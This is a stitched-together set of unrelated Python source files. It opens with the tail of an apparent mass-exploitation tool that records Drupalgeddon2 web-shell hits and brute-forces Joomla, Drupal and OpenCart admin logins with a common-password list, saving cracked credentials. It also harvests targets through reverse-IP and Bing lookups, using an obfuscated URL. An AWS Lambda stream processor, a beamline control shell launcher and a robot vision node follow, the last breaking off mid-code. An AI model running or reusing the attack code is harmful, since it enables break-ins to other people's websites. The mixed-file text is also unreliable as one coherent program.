if CheckShell.status_code == 200:
self.Print_vuln_Shell(site + '/vuln.php?cmd=id')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/vuln.php?cmd=id' + '\n')
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_NotVuln('Drupalgeddon2', site)
else:
self.Print_NotVuln('Drupalgeddon2', site)
except:
self.Print_NotVuln('Drupalgeddon2 Timeout!', site)
class JooMLaBruteForce(object):
def __init__(self, site):
self.flag = 0
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
self.m = '\033[35m'
self.c = '\033[36m'
self.w = '\033[37m'
self.rr = '\033[39m'
self.password = ["admin", "demo", "admin123", "123456", "123456789", "123", "1234", "12345", "1234567", "12345678",
"123456789", "admin1234", "admin123456", "pass123", "root", "321321", "123123", "112233", "102030",
"password", "pass", "qwerty", "abc123", "654321", "pass1234", "abc1234", "demo1", "demo2",
"demodemo", "site", "shop", "password123", "admin1", "admin12", "adminqwe", "test", "test123", "1",
"12", "123123"]
thread = []
for passwd in self.password:
t = threading.Thread(target=self.Joomla, args=(site, passwd))
if self.flag == 0:
break
else:
t.start()
thread.append(t)
time.sleep(0.08)
for j in thread:
j.join()
if self.flag == 0:
print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
+ self.y + 'Joomla BruteForce' + self.c + ' [Not Vuln]'
def Joomla(self, site, passwd):
try:
sess = requests.session()
GetToken = sess.get('http://' + site + '/administrator/index.php', timeout=5)
try:
ToKeN = re.findall('type="hidden" name="(.*)" value="1"',
GetToken.text.encode('utf-8'))[0]
GeTOPtIoN = re.findall('type="hidden" name="option" value="(.*)"', GetToken.text.encode('utf-8'))[0]
except:
ToKeN = ''
GeTOPtIoN = 'com_login'
agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
post = {}
post['username'] = "admin"
post['passwd'] = passwd
post['lang'] = 'en-GB'
post['option'] = GeTOPtIoN
post['task'] = 'login'
post[ToKeN] = '1'
url = "http://" + site + "/administrator/index.php"
GoT = sess.post(url, data=post, headers=agent, timeout=10)
if 'logout' in GoT.text.encode('utf-8'):
print self.c + ' [' + self.y + '+' + self.c + '] ' +\
self.r + site + ' ' + self.y + 'Joomla' + self.g + ' [Hacked!!]'
with open('result/Joomla_Hacked.txt', 'a') as writer:
writer.write('http://' + site + '/administrator/index.php' + '\n Username: admin' +
'\n Password: ' + passwd + '\n-----------------------------------------\n')
self.flag = 1
except Exception, e:
pass
class DrupalBruteForce(object):
def __init__(self, site):
self.flag = 0
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
self.m = '\033[35m'
self.c = '\033[36m'
self.w = '\033[37m'
self.rr = '\033[39m'
self.password = ["admin", "demo", "admin123", "123456", "123456789", "123", "1234", "12345", "1234567", "12345678",
"123456789", "admin1234", "admin123456", "pass123", "root", "321321", "123123", "112233", "102030",
"password", "pass", "qwerty", "abc123", "654321", "pass1234", "abc1234", "demo1", "demo2",
"demodemo", "site", "shop", "password123", "admin1", "admin12", "adminqwe", "test", "test123", "1",
"12", "123123"]
thread = []
for passwd in self.password:
t = threading.Thread(target=self.Drupal, args=(site, passwd))
if self.flag == 0:
break
else:
t.start()
thread.append(t)
time.sleep(0.08)
for j in thread:
j.join()
if self.flag == 0:
print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
+ self.y + 'Drupal BruteForce' + self.c + ' [Not Vuln]'
def Drupal(self, site, passwd):
try:
sess = requests.session()
GetToken = sess.get('http://' + site + '/user/login', timeout=5)
try:
GetOP = re.findall('id="edit-submit" name="op" value="(.*)"',
GetToken.text.encode('utf-8'))[0].split('"')[0]
except:
GetOP = 'Log in'
agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
post = {}
post['name'] = "admin"
post['pass'] = passwd
post['form_id'] = 'user_login'
post['op'] = GetOP
url = "http://" + site + "/user/login"
GoT = sess.post(url, data=post, headers=agent, timeout=10)
if 'Log out' in GoT.text.encode('utf-8'):
print self.c + ' [' + self.y + '+' + self.c + '] ' +\
self.r + site + ' ' + self.y + 'Drupal' + self.g + ' [Hacked!!]'
with open('result/Drupal_Hacked.txt', 'a') as writer:
writer.write('http://' + site + '/user/login' + '\n Username: admin' + '\n Password: ' +
passwd + '\n-----------------------------------------\n')
self.flag = 1
except Exception, e:
pass
class OpenCart(object):
def __init__(self, site):
self.flag = 0
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
self.m = '\033[35m'
self.c = '\033[36m'
self.w = '\033[37m'
self.rr = '\033[39m'
self.password = ["admin", "demo", "admin123", "123456", "123456789", "123", "1234", "12345", "1234567", "12345678",
"123456789", "admin1234", "admin123456", "pass123", "root", "321321", "123123", "112233", "102030",
"password", "pass", "qwerty", "abc123", "654321", "pass1234", "abc1234", "demo1", "demo2",
"demodemo", "site", "shop", "password123", "admin1", "admin12", "adminqwe", "test", "test123", "1",
"12", "123123"]
thread = []
for passwd in self.password:
t = threading.Thread(target=self.opencart, args=(site, passwd))
if self.flag == 0:
break
else:
t.start()
thread.append(t)
time.sleep(0.08)
for j in thread:
j.join()
if self.flag == 0:
print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
+ self.y + 'OpenCart' + self.c + ' [Not Vuln]'
def opencart(self, site, passwd):
try:
agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
post = {}
post['username'] = "admin"
post['password'] = passwd
url = "http://" + site + "/admin/index.php"
GoT = requests.post(url, data=post, headers=agent, timeout=10)
if 'Logout' in GoT.text.encode('utf-8'):
print self.c + ' [' + self.y + '+' + self.c + '] ' +\
self.r + site + ' ' + self.y + 'OpenCart' + self.g + ' [Hacked!!]'
with open('result/OpenCart_Hacked.txt', 'a') as writer:
writer.write('http://' + site + '/admin/index.php' + '\n Username: admin' + '\n Password: ' +
passwd + '\n-----------------------------------------\n')
self.flag = 1
except Exception, e:
pass
class reverse_ipz(object):
def __init__(self):
self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
'Accept': '*/*'}
def Reverse_ip(self, domain_Or_ipAddress):
Check = domain_Or_ipAddress
if Check.startswith("http://"):
Check = Check.replace("http://", "")
elif Check.startswith("https://"):
Check = Check.replace("https://", "")
else:
pass
try:
self.ip = socket.gethostbyname(Check)
except:
sys.exit()
Rev = requests.get(binascii.a2b_base64('aHR0cDovL3ZpZXdkbnMuaW5mby9yZXZlcnNlaXAvP2hvc3Q9') + self.ip + '&t=1',
headers=self.headers, timeout=5)
Revlist = re.findall('<tr> <td>((([a-zA-Z0-9-_]+\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}))</td>', Rev.text)
if len(Revlist) == 1000:
for url in Revlist:
with open('logs/' + self.ip + 'x.txt', 'a') as xx:
xx.write(str(url[0]) + '\n')
gotoBing = BingDorker()
gotoBing.ip_bing(self.ip)
else:
for url in Revlist:
with open('logs/' + self.ip + '.txt', 'a') as xx:
xx.write(str(url[0]) + '\n')
class BingDorker(object):
def ip_bing(self, __ip):
try:
if __ip.startswith("http://"):
__ip = __ip.replace("http://", "")
elif __ip.startswith("https://"):
__ip = __ip.replace("https://", "")
else:
pass
try:
ip = socket.gethostbyname(__ip)
except:
sys.exit()
next = 0
while next <= 500:
url = "http://www.bing.com/search?q=ip%3A" + ip + "&first=" + str(next) + "&FORM=PORE"
sess = requests.session()
cnn = sess.get(url, timeout=5)
next = next + 10
finder = re.findall(
'<h2><a href="((?:https://|http://)[a-zA-Z0-9-_]+\.*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11})',
cnn.text)
for url in finder:
if url.startswith('http://'):
url = url.replace('http://', '')
elif url.startswith('https://'):
url = url.replace('https://', '')
else:
pass
with open("logs/" + ip + "x.txt", 'a') as f:
if 'go.microsoft.com' in url:
pass
else:
f.write(str(url + '\n'))
lines = open("logs/" + ip + "x.txt", 'r').read().splitlines()
lines_set = set(lines)
count = 0
for line in lines_set:
with open("logs/" + ip + ".txt", 'a') as xx:
count = count + 1
xx.write(line + '\n')
os.unlink("logs/" + ip + "x.txt")
except IOError:
sys.exit()
except IndexError:
sys.exit()
Rock = AutoExploiter()
|
process_stream.py
|
import boto3
import logging
import csv
import os
import requests
from datetime import datetime
from botocore.exceptions import ClientError
from boto3.dynamodb.types import TypeDeserializer
from multiprocessing import Process, Pipe
# Leverage Lambda execution-environment reuse ("freezing") by caching clients at module scope
TABLE = None
S3CLIENT = None
DESERIALIZER = None
BUCKET_NAME = os.environ['BUCKET_NAME']
def upload_file(target_names, bucket_details):
# upload file to S3 bucket
if sub_folder := bucket_details['folder']:
object_name = sub_folder + "/{}".format(target_names['dest'])
else:
object_name = target_names['dest']
try:
response = S3CLIENT.upload_file(
target_names['src'],
bucket_details['bucket'],
object_name
)
except ClientError as e:
logging.error(e)
return False
return True
def extract_record_data(event):
# extract entry metadata
for record in event['Records']:
if record['eventName'] == "INSERT":
yield {
key: DESERIALIZER.deserialize(val) for key, val in record['dynamodb']['NewImage'].items()
}
def create_csv_name():
# generate a csv file name from the current time
now = datetime.now()
file_name = now.strftime("%a_%b_%d_%y_%H%M%S.%f.csv")
return file_name
def write_to_csv(file_name, event):
# write event data to specified csv file
headed = False
with open(file_name, "w") as csv_file:
for data in extract_record_data(event):
# start the dict writer and add fields if this is the first entry
if not headed:
field_names = [key for key in data.keys()]
entry_writer = csv.DictWriter(csv_file, field_names)
entry_writer.writeheader()
headed = True
# write info
entry_writer.writerow(data)
# delete if empty (TODO: a different way to handle mass deletions)
if os.stat(file_name).st_size == 0:
os.remove(file_name)
def generate_csv(event):
# write and upload a csv file containing the record data from the stream
    # this data will later be loaded into a relational database solution
file_name = create_csv_name()
local_file_name = "/tmp/" + file_name
write_to_csv(local_file_name, event)
# upload the csv file
upload_file(
{
'src': local_file_name,
'dest': file_name
},
{
'bucket': BUCKET_NAME,
'folder': 'csv'
}
)
def extract_pdf_link(data):
# return the first pdf in the record
return next(
(
link['href'] for link in data['links']
if link['type'] == "application/pdf"
), "")
def fetch_pdf(raw_id, url, conn):
# stream response from url into pdf file
file_name = raw_id + ".pdf"
local_file_name = "/tmp/" + file_name
response = requests.get(url, stream=True)
if response.status_code == 200:
with open(local_file_name, 'wb') as pdf_file:
for chunk in response.raw:
pdf_file.write(chunk)
# upload the pdf file
upload_file(
{
'src': local_file_name,
'dest': file_name
},
{
'bucket': BUCKET_NAME,
'folder': 'pdf'
}
)
conn.close()
def download_pdfs(event):
# download and then upload article pdfs to s3 storage
# leverage pipes for parallel execution (pools and queues not available in Lambda)
procs = []
for data in extract_record_data(event):
raw_id = data['rawid']
url = extract_pdf_link(data)
# one process per download
parent_conn, child_conn = Pipe()
process = Process(target=fetch_pdf, args=(raw_id, url, child_conn))
procs.append(process)
# start
for proc in procs:
proc.start()
# join
for proc in procs:
proc.join()
def process_records(event):
# create a csv in an s3 bucket containing the entry data recorded in the event
# download the article pdfs to an s3 bucket
generate_csv(event)
download_pdfs(event)
def main(event, context):
global S3CLIENT, DESERIALIZER
# load bucket
if S3CLIENT is None:
S3CLIENT = boto3.client('s3')
# load serializer
if DESERIALIZER is None:
DESERIALIZER = TypeDeserializer()
# logging
logging.root.setLevel(logging.INFO)
# process records
try:
logging.info(event['Records'])
logging.info("Processing %i records..." % len(event['Records']))
process_records(event)
except ClientError as cerr:
logging.error(cerr)
except Exception as ex:
logging.error(ex)
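# Hedged local sketch (an assumption, not part of the original Lambda handler): shows the
# DynamoDB stream event shape that extract_record_data() expects and exercises only the
# pure-Python helpers above; the record values are illustrative. Running it locally still
# requires BUCKET_NAME to be set, because the module reads it at import time.
if __name__ == "__main__":
    DESERIALIZER = TypeDeserializer()
    _sample_event = {
        "Records": [{
            "eventName": "INSERT",
            "dynamodb": {"NewImage": {
                "rawid": {"S": "example-0001"},  # hypothetical id
                "links": {"L": [{"M": {
                    "type": {"S": "application/pdf"},
                    "href": {"S": "https://example.com/example.pdf"},
                }}]},
            }},
        }],
    }
    for _record in extract_record_data(_sample_event):
        # Each yielded record is a plain dict of already-deserialized attribute values
        print(_record["rawid"], extract_pdf_link(_record))
    print("generated csv name:", create_csv_name())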
|
imalcolm.py
|
#!/dls_sw/prod/tools/RHEL6-x86_64/defaults/bin/dls-python
def make_async_logging(log_config):
# Now we have our user specified logging config, pipe all logging messages
# through a queue to make it asynchronous
from malcolm.compat import QueueListener, queue
import logging.config
# These are the handlers for our root logger, they should go through a queue
root_handlers = log_config["root"].pop("handlers")
# Create a new handler to replace all the above that just pops messages on
# a queue, and set it as the handler for the root logger (and children)
q = queue.Queue()
log_config["handlers"]["queue"] = {
"class": "malcolm.compat.QueueHandler", "queue": q}
log_config["root"]["handlers"] = ["queue"]
logging.config.dictConfig(log_config)
# Now make a queue listener that consumes messages on the queue and forwards
# them to any of the appropriate original root handlers
handlers = [logging._handlers[h] for h in root_handlers]
listener = QueueListener(q, *handlers, respect_handler_level=True)
return listener
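def _async_logging_sketch():
    # Hedged, unused illustration (never called by imalcolm) of the producer/consumer
    # pattern that make_async_logging() builds from a dict config: producers hand log
    # records to a QueueHandler, and a QueueListener thread forwards them to the real
    # handlers. Assumes malcolm.compat is importable, exactly as the function above does.
    import logging
    from malcolm.compat import QueueHandler, QueueListener, queue
    q = queue.Queue()
    real_handler = logging.StreamHandler()           # handler that actually emits records
    logging.getLogger().addHandler(QueueHandler(q))  # producers only enqueue records
    listener = QueueListener(q, real_handler, respect_handler_level=True)
    listener.start()                                 # background thread drains the queue
    logging.getLogger().warning("hello from the logging queue")
    listener.stop()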
def make_process():
import sys
import threading
import argparse
import atexit
import os
import getpass
import json
from ruamel import yaml
# These are the locals that we will pass to the console
locals_d = {}
parser = argparse.ArgumentParser(
description="Interactive shell for malcolm")
parser.add_argument(
'--client', '-c',
help="Add a client to given server, like ws://localhost:8080 or pva")
parser.add_argument(
'--logcfg', help="Logging dict config in JSON or YAML file")
parser.add_argument(
"--profiledir", help="Directory to store profiler results in",
default="/tmp/imalcolm_profiles")
parser.add_argument(
'yaml', nargs="?",
help="The YAML file containing the blocks to be loaded")
args = parser.parse_args()
log_config = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"simple": {
"format": "%(name)s: %(message)s"
},
"extended": {
"format": "%(asctime)s - %(levelname)6s - %(name)s\n"
" %(message)s"
},
},
"handlers": {
"console": {
"class": "logging.StreamHandler",
"level": "WARNING",
"formatter": "simple",
"stream": "ext://sys.stdout"
},
# "local_file_handler": {
# "class": "logging.handlers.RotatingFileHandler",
# "level": "DEBUG",
# "formatter": "extended",
# "filename": "/tmp/debug.log",
# "maxBytes": 100048576,
# "backupCount": 4,
# "encoding": "utf8"
# },
"graylog_gelf": {
"class": "pygelf.GelfUdpHandler",
# Obviously a DLS-specific configuration: the graylog server
# address and port
"host": "cs04r-sc-serv-14.diamond.ac.uk",
"port": 12202,
"debug": True,
"level": "DEBUG",
# The following custom fields will be disabled if setting this
# False
"include_extra_fields": True,
"username": getpass.getuser(),
"pid": os.getpid()
}
},
# "loggers": {
# # Fine-grained logging configuration for individual modules or
# # classes
# # Use this to set different log levels without changing 'real' code.
# "myclasses": {
# "level": "DEBUG",
# "propagate": True
# },
# "usermessages": {
# "level": "INFO",
# "propagate": True,
# "handlers": ["console"]
# }
# },
"root": {
"level": "DEBUG",
"handlers": ["graylog_gelf", "console"],
}
}
if args.logcfg:
with open(args.logcfg) as f:
text = f.read()
if args.logcfg.endswith(".json"):
file_config = json.loads(text)
else:
file_config = yaml.load(text, Loader=yaml.RoundTripLoader)
if file_config:
log_config = file_config
# Start it off, and tell it to stop when we quit
listener = make_async_logging(log_config)
listener.start()
atexit.register(listener.stop)
# Setup Qt gui, must be done before any malcolm imports otherwise cothread
# starts in the wrong thread
try:
os.environ['DISPLAY']
# If this environment variable doesn't exist then there is probably no
# X server for us to talk to.
except KeyError:
qt_thread = None
else:
from PyQt4.Qt import QApplication
# Start qt
def start_qt():
app = QApplication(sys.argv)
app.setQuitOnLastWindowClosed(False)
locals_d["app"] = app
from malcolm.gui.guiopener import GuiOpener
global opener
opener = GuiOpener()
app.exec_()
qt_thread = threading.Thread(target=start_qt)
qt_thread.setDaemon(True)
def gui(block):
global opener
opener.open_gui(block, proc)
locals_d["gui"] = gui
# Setup profiler dir
try:
from malcolm.modules.profiling.parts import ProfilingViewerPart
from malcolm.modules.profiling.profiler import Profiler
except ImportError:
raise
else:
if not os.path.isdir(args.profiledir):
os.mkdir(args.profiledir)
ProfilingViewerPart.profiledir = args.profiledir
locals_d["profiler"] = Profiler(args.profiledir)
#locals_d["profiler"].start()
from malcolm.core import Process, call_with_params, Context, Queue
from malcolm.modules.builtin.blocks import proxy_block
from malcolm.yamlutil import make_include_creator
if args.yaml:
proc_name = os.path.basename(args.yaml).split(".")[-2]
proc = Process(proc_name)
assembly = make_include_creator(args.yaml)
call_with_params(assembly, proc)
proc_name = "%s - imalcolm" % proc_name
else:
proc = Process("Process")
proc_name = "imalcolm"
# set terminal title
sys.stdout.write("\x1b]0;%s\x07" % proc_name)
if args.client:
if args.client.startswith("ws://"):
from malcolm.modules.web.controllers import WebsocketClientComms
hostname, port = args.client[5:].split(":")
comms = call_with_params(
WebsocketClientComms, proc, [],
mri="%s:%s" % (hostname, port), hostname=hostname,
port=int(port))
elif args.client == "pva":
from malcolm.modules.pva.controllers import PvaClientComms
comms = call_with_params(PvaClientComms, proc, [], mri="pva")
else:
raise ValueError(
"Don't know how to create client to %s" % args.client)
proc.add_controller(comms.mri, comms)
class UserContext(Context):
def make_queue(self):
return Queue(user_facing=True)
def post(self, path, params=None, timeout=None):
try:
return super(UserContext, self).post(path, params, timeout)
except KeyboardInterrupt:
self.post([path[0], "abort"])
raise
def make_proxy(self, comms, mri):
call_with_params(proxy_block, proc, comms=comms, mri=mri)
locals_d["self"] = UserContext(proc)
if qt_thread:
qt_thread.start()
proc.start()
locals_d["process"] = proc
return locals_d
def main():
locals_d = make_process()
header = """Welcome to iMalcolm.
self.mri_list:
%s
Try:
hello = self.block_view("HELLO")
print hello.greet("me")
or
gui(self.block_view("COUNTER"))
or
self.make_proxy("localhost:8080", "HELLO")
print self.block_view("HELLO").greet("me")
""" % (locals_d["self"].mri_list,)
try:
import IPython
except ImportError:
import code
code.interact(header, local=locals_d)
else:
locals().update(locals_d)
IPython.embed(header=header)
if "app" in locals_d:
locals_d["app"].quit()
if "profiler" in locals_d:
if locals_d["profiler"].started:
locals_d["profiler"].stop()
# TODO: tearDown doesn't work properly yet
# locals_d["process"].stop()
if __name__ == "__main__":
print("Loading...")
import os
import sys
os.environ["EPICS_CA_MAX_ARRAY_BYTES"] = "6000000"
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
from pkg_resources import require
#sys.path.insert(0,
# "/dls_sw/work/tools/RHEL6-x86_64/odin/venv/lib/python2.7/"
# "site-packages")
require("tornado", "numpy", "ruamel.yaml", "cothread==2.14", "vdsgen==0.2",
"pygelf==0.3.1", "scanpointgenerator", "plop", "h5py==2.7.1")
#sys.path.append(os.path.join(os.path.dirname(__file__), "..", "..", "cothread"))
#sys.path.append(
# "/home/tmc43/virtualenvs/pymalcolm/lib/python2.7/site-packages")
sys.path.append(
"/dls_sw/work/R3.14.12.3/support/pvaPy/lib/python/2.7/linux-x86_64")
main()
|
vision.py
|
#! /usr/bin/env python3
import os
import cv2
import rospy
import rospkg
from copy import deepcopy
from cv_bridge import CvBridge
from threading import Thread, Lock
from dynamic_reconfigure.server import Server
from sensor_msgs.msg import Image
from geometry_msgs.msg import PolygonStamped
from humanoid_league_msgs.msg import BallInImageArray, LineInformationInImage, \
ObstacleInImageArray, ObstacleInImage, RegionOfInterestWithImage, \
GoalPostInImageArray, Audio
from bitbots_vision.vision_modules import lines, field_boundary, color, debug, \
obstacle, yolo_handler, ros_utils, candidate
from bitbots_vision.cfg import VisionConfig
from bitbots_msgs.msg import Config, ColorLookupTable
try:
    from profilehooks import profile, timecall  # Profilehooks profiles certain functions if you add the @profile or @timecall decorator.
except ImportError:
    rospy.loginfo("No profiling available", logger_name="vision")
class Vision:
"""
The Vision is the main ROS-node for handling all tasks related to image processing.
This class defines the whole image processing pipeline, which uses the modules from the `vision_modules`.
It also handles the dynamic reconfiguration of the bitbots_vision.
"""
def __init__(self):
        # type: () -> None
"""
Initiating 'bitbots_vision' node.
:return: None
"""
rospack = rospkg.RosPack()
self._package_path = rospack.get_path('bitbots_vision')
rospy.init_node('bitbots_vision')
rospy.loginfo('Initializing vision...', logger_name="vision")
self._cv_bridge = CvBridge()
self._config = {}
# Publisher placeholder
self._pub_audio = None
self._pub_balls = None
self._pub_lines = None
self._pub_line_mask = None
self._pub_obstacle = None
self._pub_goal_posts = None
#self._pub_ball_fcnn = None
self._pub_debug_image = None
#self._pub_debug_fcnn_image = None
self._pub_convex_field_boundary = None
self._pub_white_mask_image = None
self._pub_red_mask_image = None
self._pub_blue_mask_image = None
self._pub_field_mask_image = None
self._pub_dynamic_color_lookup_table_field_mask_image = None
# Subscriber placeholder
self._sub_image = None
self._sub_dynamic_color_lookup_table_msg_topic = None
# Debug image drawer placeholder
self._debug_image_creator = None
# Register static publishers
# Register publisher of 'vision_config'-messages
# For changes of topic name: also change topic name in dynamic_color_lookup_table.py
self._pub_config = rospy.Publisher(
'vision_config',
Config,
queue_size=1,
latch=True)
# Needed for operations that should only be executed on the first image
self._first_image_callback = True
# Reconfigure data transfer variable
self._transfer_reconfigure_data = None
self._transfer_reconfigure_data_mutex = Lock()
# Image transfer variable
self._transfer_image_msg = None
self._transfer_image_msg_mutex = Lock()
# Yolo placeholder
self._yolo = None
# Add model enums to _config
ros_utils.add_model_enums(VisionConfig, self._package_path)
ros_utils.add_color_lookup_table_enum(VisionConfig, self._package_path)
# Register VisionConfig server (dynamic reconfigure) and set callback
srv = Server(VisionConfig, self._dynamic_reconfigure_callback)
# Add general params
ros_utils.set_general_parameters(["caching"])
# Define the rate of a sleep timer
self._rate = rospy.Rate(100)
# Run the vision main loop
self._main_loop()
def _main_loop(self):
"""
Main loop that processes the images and configuration changes
"""
while not rospy.is_shutdown():
# Check for reconfiguration data
if self._transfer_reconfigure_data is not None:
# Copy reconfigure data from shared memory
with self._transfer_reconfigure_data_mutex:
reconfigure_data = deepcopy(self._transfer_reconfigure_data)
self._transfer_reconfigure_data = None
# Run vision reconfiguration
self._configure_vision(*reconfigure_data)
# Check for new image
elif self._transfer_image_msg is not None:
# Copy image from shared memory
with self._transfer_image_msg_mutex:
image_msg = self._transfer_image_msg
self._transfer_image_msg = None
# Run the vision pipeline
self._handle_image(image_msg)
# Now the first image has been processed
self._first_image_callback = False
else:
try:
self._rate.sleep()
except rospy.exceptions.ROSTimeMovedBackwardsException:
pass
def _dynamic_reconfigure_callback(self, config, level):
"""
Callback for the dynamic reconfigure configuration.
:param config: New _config
        :param level: The level is a definable int in the Vision.cfg file. All changed params are OR'ed together by dynamic reconfigure.
"""
with self._transfer_reconfigure_data_mutex:
# Set data
self._transfer_reconfigure_data = (config, level)
return config
def _configure_vision(self, config, level):
"""
Handle dynamic reconfigure configuration.
:param config: New _config
        :param level: The level is a definable int in the Vision.cfg file. All changed params are OR'ed together by dynamic reconfigure.
"""
self._register_or_update_all_publishers(config)
# Set max number of balls
self._max_balls = config['ball_candidate_max_count']
# Set some thresholds
# Brightness threshold which determines if the camera cap is on the camera.
self._blind_threshold = config['vision_blind_threshold']
# Threshold for ball candidates
self._ball_candidate_threshold = config['ball_candidate_rating_threshold']
# Maximum offset for balls over the convex field boundary
self._ball_candidate_y_offset = config['ball_candidate_field_boundary_y_offset']
# Maximum offset for balls over the convex field boundary
self._goal_post_field_boundary_y_offset = config['goal_post_field_boundary_y_offset']
# Which line type should we publish?
self._use_line_points = config['line_detector_use_line_points']
self._use_line_mask = config['line_detector_use_line_mask']
# Should the debug image be published?
if ros_utils.config_param_change(self._config, config, 'vision_publish_debug_image'):
if config['vision_publish_debug_image']:
rospy.loginfo('Debug images are enabled', logger_name="vision")
else:
rospy.loginfo('Debug images are disabled', logger_name="vision")
# Create debug drawer
self._debug_image_creator = debug.DebugImage(config['vision_publish_debug_image'])
'''
# Should the fcnn output (only under the field boundary) be published?
if ros_utils.config_param_change(self._config, config, 'ball_fcnn_publish_output'):
self._ball_fcnn_publish_output = config['ball_fcnn_publish_output']
if self._ball_fcnn_publish_output:
rospy.loginfo('ball FCNN output publishing is enabled', logger_name="vision")
else:
rospy.loginfo('ball FCNN output publishing is disabled', logger_name="vision")
# Should the whole fcnn output be published?
if ros_utils.config_param_change(self._config, config, 'ball_fcnn_publish_debug_img'):
self._publish_fcnn_debug_image = config['ball_fcnn_publish_debug_img']
if self._publish_fcnn_debug_image:
rospy.loginfo('Ball FCNN debug image publishing is enabled', logger_name="vision_fcnn")
else:
rospy.loginfo('Ball FCNN debug image publishing is disabled', logger_name="vision_fcnn")
'''
# Should the HSV mask images be published?
if ros_utils.config_param_change(self._config, config, 'vision_publish_HSV_mask_image'):
self._publish_HSV_mask_image = config['vision_publish_HSV_mask_image']
if self._publish_HSV_mask_image:
rospy.loginfo('HSV mask image publishing is enabled', logger_name="vision_hsv_color_detector")
else:
rospy.loginfo('HSV mask image publishing is disabled', logger_name="vision_hsv_color_detector")
# Should the (dynamic color lookup table-) field mask image be published?
if ros_utils.config_param_change(self._config, config, 'vision_publish_field_mask_image'):
self._publish_field_mask_image = config['vision_publish_field_mask_image']
if self._publish_field_mask_image:
rospy.loginfo('(Dynamic color lookup table-) Field mask image publishing is enabled', logger_name="dynamic_color_lookup_table")
else:
rospy.loginfo('(Dynamic color lookup table-) Field mask image publishing is disabled', logger_name="dynamic_color_lookup_table")
# Set the white color detector
if ros_utils.config_param_change(self._config, config, r'^white_color_detector_'):
if config['white_color_detector_use_color_lookup_table']:
self._white_color_detector = color.PixelListColorDetector(config, self._package_path, 'white_color_detector_color_lookup_table_path')
else:
self._white_color_detector = color.HsvSpaceColorDetector(config, "white")
# Set the red color detector
if ros_utils.config_param_change(self._config, config, r'^red_color_detector_'):
self._red_color_detector = color.HsvSpaceColorDetector(config, "red")
# Set the blue color detector
if ros_utils.config_param_change(self._config, config, r'^blue_color_detector_'):
self._blue_color_detector = color.HsvSpaceColorDetector(config, "blue")
# Check if params changed
if ros_utils.config_param_change(self._config, config,
r'^field_color_detector_|dynamic_color_lookup_table_') and not config['field_color_detector_use_hsv']:
# Check if the dynamic color lookup table field color detector or the static field color detector should be used
if config['dynamic_color_lookup_table_active']:
# Set dynamic color lookup table field color detector
self._field_color_detector = color.DynamicPixelListColorDetector(
config,
self._package_path)
else:
# Unregister old subscriber
if self._sub_dynamic_color_lookup_table_msg_topic is not None:
# self._sub_dynamic_color_lookup_table_msg_topic.unregister() # Do not use this method, does not work
self._sub_dynamic_color_lookup_table_msg_topic = None
# Set the static field color detector
self._field_color_detector = color.PixelListColorDetector(
config,
self._package_path)
# Check if params changed
if ros_utils.config_param_change(self._config, config,
r'^field_color_detector_|field_color_detector_use_hsv') and config['field_color_detector_use_hsv']:
# Unregister old subscriber
if self._sub_dynamic_color_lookup_table_msg_topic is not None:
# self._sub_dynamic_color_lookup_table_msg_topic.unregister() # Do not use this method, does not work
self._sub_dynamic_color_lookup_table_msg_topic = None
# Override field color hsv detector
self._field_color_detector = color.HsvSpaceColorDetector(config, "field")
# Get field boundary detector class by name from _config
field_boundary_detector_class = field_boundary.FieldBoundaryDetector.get_by_name(
config['field_boundary_detector_search_method'])
# Set the field boundary detector
self._field_boundary_detector = field_boundary_detector_class(
config,
self._field_color_detector)
# Set the line detector
self._line_detector = lines.LineDetector(
config,
self._white_color_detector,
self._field_color_detector,
self._field_boundary_detector)
# Set the obstacle detector
self._obstacle_detector = obstacle.ObstacleDetector(
config,
self._field_boundary_detector)
# If dummy ball detection is activated, set the dummy ballfinder as ball detector
if config['neural_network_type'] == 'dummy':
self._ball_detector = candidate.DummyCandidateFinder()
# If we don't use YOLO set the conventional goalpost detector.
self._goalpost_detector = obstacle.ColorObstacleDetector(
self._obstacle_detector,
self._white_color_detector,
threshold=config['obstacle_color_threshold'])
'''
# Check if the fcnn is activated
if config['neural_network_type'] == 'fcnn':
# Check if its the first callback, the fcnn is newly activated or the model has changed
if ros_utils.config_param_change(self._config, config, ['fcnn_model_path', 'neural_network_type']):
# Build absolute model path
ball_fcnn_path = os.path.join(self._package_path, 'models', config['fcnn_model_path'])
# Check if it exists
if not os.path.exists(os.path.join(ball_fcnn_path, "model_final.index")):
rospy.logerr('AAAAHHHH! The specified fcnn model file doesn\'t exist! Maybe its a YOLO model? Look twice.', logger_name="vision_fcnn")
else:
self._ball_fcnn = live_fcnn_03.FCNN03(ball_fcnn_path)
rospy.loginfo("FCNN vision is running now", logger_name="vision_fcnn")
#Check if ball_fcnn _config or the neural network type has changed
if ros_utils.config_param_change(self._config, config, r'^ball_fcnn_') or \
ros_utils.config_param_change(self._config, config, 'neural_network_type'):
# Set fcnn handler
self._ball_detector = fcnn_handler.FcnnHandler(
config,
self._ball_fcnn)
# When using the FCNN, set the conventional goalpost detector.
self._goalpost_detector = obstacle.ColorObstacleDetector(
self._obstacle_detector,
self._white_color_detector,
